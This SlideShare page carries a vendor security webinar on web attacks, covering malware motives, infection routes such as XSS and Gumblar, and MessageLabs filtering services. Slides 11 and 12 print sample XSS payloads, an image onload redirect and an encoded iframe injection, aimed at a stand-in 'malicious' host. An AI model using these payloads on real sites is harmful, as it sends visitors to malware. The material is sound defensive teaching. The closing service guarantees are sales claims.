Anatomy Web Attack

1,073 views

Published on

Published in: Technology
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,073
On SlideShare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
0
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide
  • Kelly: Welcome to today’s session Anatomy of a Web Attack. Today, we will review an increasingly sophisticated and hostile environment that exists in today's Internet. In the case of those looking to harm your business, you have several things to consider. Our speaker Lee Rothman will walk you through the various types of attacks, the reason we think malware exists through the Web and what you can do to protect your business. Lee Rothman joined Symantec Hosted Services in 2006 as the principal system engineer of North America. Lee joined the engineering team with 10 years of Internet and security experience, specializing in Internetworking. Prior to Symantec Hosted Services, Lee spent several years as a sales engineer for a large integrator and was product marketing manager for a large Fortune 500 company. Lee acts as a product expert in North America and aids the Sales, Product, and Marketing teams. Lee, can you please take us through today’s session?
  • Today’s agenda is pretty simple. We are going to first go through the business challenges that companies face when it comes to the Web. I’ll then cover some statistics around the Web and how employees are using the Web in your organization. Finally, I will walk through a few examples of how attacks happen through the Internet. Finally, I will give some basic suggestions on how you can solve this problem.
  • Let’s first explore the business challenge. Disclaimer, Acme is not a real company. In this example, the Acme corporation faces a common problem, they want to allow their users business and reasonable personal web access but they want to make sure that they are protected against the common threats. As a business, Acme is really looking to solve these four issues. Productivity Offensive Materials Abuse of resources MalwareMost companies now face this challenge and are trying to manage this very real issue. Most companies haven’t really put a security issue in place because the security of the Web has not been an issue (or so they think) in their business. However, if we look at the data we can see some really compelling reasons why security for web should be considered.
  • Now that we know why they do it, what are the ways in which they get introduced to a company? I’ve put these types of attacks into 5 categoriesBad LinksAdvertisingXSSGumblar Web ServicesLet’s explore these categories in-depth.
  • Second, IT Managers should consider putting policies in place.
  • Third, IT Managers should consider monitoring their environments.
  • Lastly, IT Managers should be sure they have a malware protection place that is effective.
  • It’s important that we give a special thanks to our malware team in particular Martin Lee from our research and response team. Without his help, this webcast would not be possible.
  • Anatomy Web Attack

    1. 1. Anatomy of a Web Attack<br />1<br />
    2. 2. Agenda<br />Challenges Corporation Face <br />Web Usage Statistics<br />Web Attacks<br />Solving the Problem<br />MessageLabs Services<br />
    3. 3. The Challenge<br />The Acme corporation faces a common problem, they want to allow their users business and reasonable personal web access but they want to make sure that they are protected against the common threats:<br /> Productivity<br /> Offensive Materials<br /> Abuse of resources<br /> Malware<br />
    4. 4. Lots of websites<br />Average 2,465 new malware websites per day.<br />
    5. 5. Why malware?<br />Monetize the attack.<br /><ul><li>Install my software – botnet - spam / DDOS
    6. 6. Steal your credentials - bank theft / fraud
    7. 7. Steal your data – confidential data / fraud</li></li></ul><li>How do you get it?<br />Bad Links<br />Advertising<br />XSS<br />Gumblar<br />Services <br />6<br />
    8. 8. Getting Web Malware<br />Bad Link<br />postcard.jpg.exe<br />
    9. 9. Advertise It<br />Subvert a legitimate website<br />Adverts<br />
    10. 10. Fake AV Advert<br />
    11. 11. XSS Attack<br />User content<br />No. Your wrong.<br />Duh! Its “you’re”.<br />I agree. <img src=“/images/smiley.gif” <br /> onload=“document.location=‘http://malicious/’”><br />
    12. 12. XSS IFrame Attack<br />http://genuine/index.php?search="'><br /><iframe src="http://malicious“ <br />height=“100%" width=“100%"><br /></iframe><br />http://genuine/index.php?search="'><br />%3C%69%66%72%61%6D%65%20<br />%73%72%63%3D%22%68%74%74<br />%70%3A%2F%2F%6D%61%6C%69<br />%63%69%6F%75%73%201C%20<br />%0A%68%65%69%67%68%74%3D<br />%201C%31%30%30%25%22%20<br />%77%69%64%74%68%3D%201C<br />%31%30%30%25%22%3E%0A%3C<br />%2F%69%66%72%61%6D%65%3E%0A<br />
    13. 13. Web Malware<br />Malware<br />Malicious instructions<br />Browser / JS / Flash / PDF<br />Complete control<br />Victim<br />Bad Guy<br />
    14. 14. Gumblar Lifecycle<br />User visits website with XSS exploit<br />User is forwarded to host serving malware<br />Malware installed (often flash or PDF)<br />Malware steals website logins, forwards to hacker<br />Hacker logs into website, installs XSS exploit<br />
    15. 15. Gumblar Prevalance<br />Up to 60% of all malicious web traffic is Gumblar.<br />
    16. 16. How You Can Protect Yourself<br />15<br />
    17. 17. Controlling the web<br />IT Management should first consider controlling the Web;<br />Policy engine includes:<br />Categorised URL database<br />MIME and file type lists <br />Time periods<br />User and group based policies<br />Customizable block messages<br />Controls HTTP and HTTPS<br />
    18. 18. Building the policy<br />No access to travel, leisure and sport between 9am and 5pm<br />No access to sex, guns or drugs<br />No access to streaming audio and video (reduce bandwidth)<br />Only support can download executables<br />
    19. 19. Monitoring access<br />Dashboard – 1 year of high level information<br />Detailed reports up to 6 months of URL and Malware information<br />Customizable reports in PDF format<br />Scheduled reports sent directly to your inbox<br />
    20. 20. Malware Protection<br />Scans HTTP and FTP/HTTP traffic<br />Multiple signature based AV engines<br />Skeptic technology<br />Customizable block messages<br />Converged analysis<br />No noticeable latency<br />
    21. 21. You have choices for Web Security<br />20<br />
    22. 22. Why use a hosted services over hardware or software?<br />
    23. 23. Why use MessageLabs Services?<br />Best Client and Technical Support <br />Global Support is 24/7/365 & included with the service<br />Support SLA protects your business<br />Always get a live person who speaks your language<br />Dedicated CSM team<br />Best Services<br />Awarding Winning<br />Analyst approved<br />Backed by strongest SLAs <br />
    24. 24. Most Robust Global Infrastructure<br />Incorporating 14 data centers spanning four continents<br />Every data center is scalable and secured to the highest standards<br />Clustered high performance servers, each cluster has full redundancy within itself and all other hardware is duplicated<br />23<br />
    25. 25. Best Service Level Agreements<br />Web<br />Anti-Virus Protection  100% protection from known and unknown email viruses<br />Credit is offered if a client infected by a virus<br />Anti-Virus Protection  100% protection against known viruses<br />Credit is offered if a client infected by a virus<br />Email<br />Archiving<br />Latency  Average scanning time of 100% of web content is within 100 milliseconds<br />Credit is offered if latency exceeds 100 milliseconds<br />Virus False Positives  0.0001% FP capture rate<br />Credit is offered if we do not meet this commitment<br />Service Availability  100% uptime<br />Credit is offered if availability falls below 100%<br />Client may terminate if availability falls below 95%<br />Spam Capture Rate  99% capture rate (95% for emails containing Asian characters)<br />Credit is offered if we do not meet this commitment<br />Support<br />Service Availability Guarantee 99.9% uptime for archiving network<br />Client may terminate if availability falls below 90%<br />Spam False Positives  0.0003% FP capture rate<br />Credit is offered if we do not meet this commitment<br />Appliance Replacement Guarantee If appliance fails during the warranty period, MessageLabs will repair or replace the appliance within 3 business days at no cost<br />Latency  Average roundtrip time of 100% of email delivered in less than 60 seconds<br />Credit is offered if latency exceeds 1 minute<br />Delivery  100% delivery guarantee<br />Client may terminate if we do not meet this<br />Technical support / Fault Response critical - 95% calls within 2hrs; major - 85% calls within 4hrs; minor - 75% calls within 8hrs<br />Credit is offered if we do not meet this commitment<br />Service Availability  100% uptime<br />Credit is offered if availability falls below 100%<br />Client may terminate if availability falls below 95%<br />
    26. 26. Best Shared Intelligence<br />Accuracy, Reliability & Performance<br />The automatic sharing of knowledge gained in one protocol across all other protocols underpins MessageLabs Converged Threat Analysis. Security solutions that only focus on a single protocol such as email or web, or those that lack integration at the level of threat detection, may not sufficiently protect your business from malware and spyware designed to slip past single protocol security.<br />
    27. 27. Q&A<br />Visit: www.MessageLabs.com<br />Phone: 866.460.0000<br />Email: Lrothman@MessageLabs.com<br />26<br />
    28. 28. Special Thanks<br />27<br />Martin Lee MIET CISSP<br />Research & Response Team<br />Symantec Hosted Services<br />

    ×